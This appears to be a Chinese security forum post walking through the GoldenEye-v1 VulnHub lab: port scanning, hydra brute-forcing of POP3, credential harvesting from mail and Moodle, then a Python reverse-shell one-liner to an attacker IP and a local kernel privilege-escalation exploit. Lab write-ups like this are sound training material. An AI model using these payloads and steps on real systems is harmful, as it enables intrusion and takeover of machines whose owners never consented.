电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 1967 人浏览分享

GlodenEye-v1黄金眼靶场复现

[复制链接]
1967 0
vulhub靶场链接:https://www.vulnhub.com/entry/goldeneye-1,240/

本篇将靶场搭建在VMware中,并将网卡调配为nat模式

作者将其评定为中级,有获得root所需的多种技术,没有漏洞利用开发/缓冲区溢出

靶机地址:192.168.0.164

kali地址:192.168.0.136

首先扫描存活主机获取靶机ip

nmap -sP 192.168.0.1/24

QQ截图20221215110922.png

可以看到靶机的ip地址,之后扫描开放端口,寻找攻击点

nmap -sS -sV -T5 -A -p- 192.168.0.164

-sS隐蔽扫描,-sV服务版本,-T时间等级{0-5},-A综合扫描,-p-全端口扫描

11028.png

发现有stmp,Apache,pop3

25/tcp open smtp Postfix smtpd

80/tcp open http Apache httpd 2.4.7 ((Ubuntu))

55006/tcp open ssl/pop3 Dovecot pop3d

55007/tcp open pop3 Dovecot pop3d

一. 查看网站信息收集

尝试访问80端口

11026.png

可以看到这是一个辅助控制站,并将我们定位到/sev-home/进行登录

访问192.168.0.164/sev-home/

11022.png

尝试一下弱密码
admin,admin
admin123
test123
不成功
尝试去源码找东西,返回主界面

300.png

发现一个.js文件,去看看

298.png

可疑的html注释,去解码一下

296.png

密码破解出来了

找了半天用户名,发现源码里面有两个人名,为什么是用户名,你得根据前后文判断

289.png

用户名:Boris/Natalya

密码:InvincibleHack3r

成功,tmd boris是小写,最后登录成功boris/InvincibleHack3r

288.png

GoldenEye是一个绝密的苏联军事武器项目。既然您有权访问,您肯定持有绝密许可,并有资格成为经认证的GoldenEye网络
运营商(GNO)。请发送电子邮件给合格的GNO主管,以接受在线GoldenEyeOperators培训,成为GoldenEyes系统的管理
员我们已经将pop3服务配置为在非常高的非默认端口上运行

上面我们就扫到了pop3在很高的端口55007

查看

286.png

二.邮局等协议

pop3协议

op3协议--Post Office Protocol - Version 3”,即“邮局协议版本3”,是TCP/IP协议族内所属,它是规定怎样将
个人计算机连接到Internet的邮件服务器和下载电子邮件的电子协议,提供了SSL加密的POP3协议被称为POP3S。
pop协议具体工作原理可以理解为,邮件发送到邮件服务器上,之后用户可以利用自己的计算机将邮件下
载下来查看下载之后默认邮件服务器会将邮件删除。

但是大部分电子邮件服务器会设置,“只下载邮件,服务器端并不删除”。也就是改进之后的pop3协议。

STMP协议

SMTP的全称是“Simple Mail Transfer Protocol”,即简单邮件传输协议。它是一组用于从源地址到目
的地址传输邮件的规范,通过它来控制邮件的中转方式。
SMTP 协议属于 TCP/IP 协议簇,它帮助每台计算机在发送或中转信件时找到下一个目的地
SMTP 服务器就是遵循 SMTP 协议的发送邮件服务器。
SMTP 认证,简单地说就是要求必须在提供了账户名和密码之后才可以登录 SMTP 服务器这就
使得那些垃圾邮件的散播者无可乘之机。

增加 SMTP 认证的目的是为了使用户避免受到垃圾邮件的侵扰。

IMAP协议

IMAP全称是Internet Mail Access Protocol,即交互式邮件存取协议,它是跟POP3类似邮件访问标准协议之一。
不同的是,开启了IMAP后,您在电子邮件客户端收取的邮件仍然保留在服务器上,同时在客户端上的操作都
会反馈到服务器上,如:删除邮件,标记已读等,服务器上的邮件也会做相应的动作。

所以无论从浏览器登录邮箱或者客户端软件登录邮箱,看到的邮件以及状态都是一致的。

pop3协议与IMAP协议最大的区别就是交互性,也就是IMAP的名字所说,IMAP客户端的所有操作都会同
步到服务端,进行客户端与服务端的双向交流。

此时我们利用九头蛇来爆破pop3密码

三.九头蛇破解pop3密码

hydra是著名组织thc的一款开源的暴力破解密码工具,功能非常强大

kali下是默认安装的,几乎支持所有协议的在线破解。

首先将我们收集到的用户名放入到一个文本文件中

之后利用kali自带的pop3爆破字典进行爆破

注:kali会自带的!!!!!!!!!!!

路径:/usr/share/wordlists/

285.png

成功爆破出两组账密

283.png

natalya/bird

boris/secret1!

四.利用nc登录pop3服务器进一步信息收集

我们使用Netcat通过pop3端口并使用用户“ boris、natalya”凭据登录到目标服务器邮箱中。

这是pop3登录的参数与指令

282.png

nc 192.168.0.164 55007

首先我们利用user与pass参数登录,之后查看邮件个数与大小

之后利用retr uid查看邮件具体内容

281.png

280.png

懵逼,这里第二封邮件里面,natalya说我可以破坏你的密码!

尝试使用natalya的用户进行登录

可以看到有两封邮件

269.png

268.png

可以看到有账目名密码并获取到了内部域名severnaya站

severnaya-station.com/gnocertdir

xenia/RCP90rulez!

根据提示,我们需要将此网址加入到hosts文件中才可以解析

262.png

尝试访问

261.png

是一个开源的cms--moodle

260.png

利用刚刚爆出的账号密码进行登录

228.png

找到一个新的用户名

226.png

继续爆破查看有用的信息

222.png

doak/goat

爆破出账号密码

继续查看pop3邮件

221.png

继续使用账号名密码进行登录moodle

dr_doak/4England!

220.png

看到了moodle的版本信息

219.png

218.png

查看txt文件

216.png

看到一个jpg文件,访问一下

212.png

抽象的图片,查看源码发现并没有什么有用的信息

五.strings指令利用

尝试查看图层信息
利用strings查看图片信息
strings命令在对象文件或二进制文件中查找可打印的字符串。字符串是4个或更多可打印字符的任意序列以
换行符或空字符结束。 strings命令对识别随机对象文件很有用。

211.png

鹤立鸡群了属于是

eFdpbnRlcjE5OTV4IQ==去尝试解码

210.png

admin/xWinter1995x!

尝试用此密码登录admin用户

209.png

进入了管理员界面

六.获取shell及最后提权

方法一:利用msf getshell

但是没有什么卵用,事实就是直接获取版本信息然后msf一把梭

208.png

查看到有远程命令执行漏洞,尝试使用一波

206.png

看到还是需要账密的嘛,说明前面的套娃还是有用的

set username adminset password xWinter1995x!set rhosts severnaya-station.comset targe
turi /gnocertdirset payload cmd/unix/reverseset lhost 192.168.0.136

202.png

201.png

配置参数之后发现仍然无法成功,因为msf底层代码使用的是pslellshell,但是该网页使用的是
googleshell所以没办法运行

但是进入网站后台可以进行修改

Home /► Site administration / ►Plugins / ► Text editors / ►TinyMCE HTML editor

200.png

189.png

再尝试一下

188.png

成功

获得了shell,但是不是稳定shell,尝试利用python的pty来获得交互的shell

python3 -c 'import pty; pty.spawn("/bin/bash")'



python3 -c "__ import __('subprocess').call(['/bin/bash'])"

186.png

uname -a查看版本,获取提权漏洞进行提权

183.png

搜索提权漏洞

searchsploit 3.13.0

查看到两个漏洞

查看绝对路径,searchsploit -m linux/local/37292.c

182.png

181.png

复制到桌面

利用python http服务将脚本传到目标服务器中

180.png

169.png

成功,尝试编译脚本

168.png

提示才发现,靶机没有gcc环境,只能回去修改了

166.png

将此处的gcc修改为cc

重新下载下来

163.png

进行编译cc -o exp 37292.c 生成可执行文件

162.png

赋权exp

161.png

成功提权!!!!!!!!!!

方法二:利用payload反弹shell

还是像之前那样,首先我们需要将Spell engine改为PspellShell

160.png

之后,找到

Home /► Site administration /►Server /► System paths

100.png

改为

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s
.connect(("192.168.0.136",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p
=subprocess.call(["/bin/sh","-i"]);'

上面IP改为攻击机IP,记得保存

攻击机开启监听

新建邮件:Home /►My profile /►Blogs /►Add a new entry

89.png

随意输入数据,之后直接点击Toggle spellchecker

查看监听,成功反弹shell

88.png

获得交互shell

python -c ‘import pty; pty.spawn("/bin/bash")’

87.png

可以看到还留着之前的提权脚本

直接运行

86.png

成功提权

好好学习,天天向上!

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.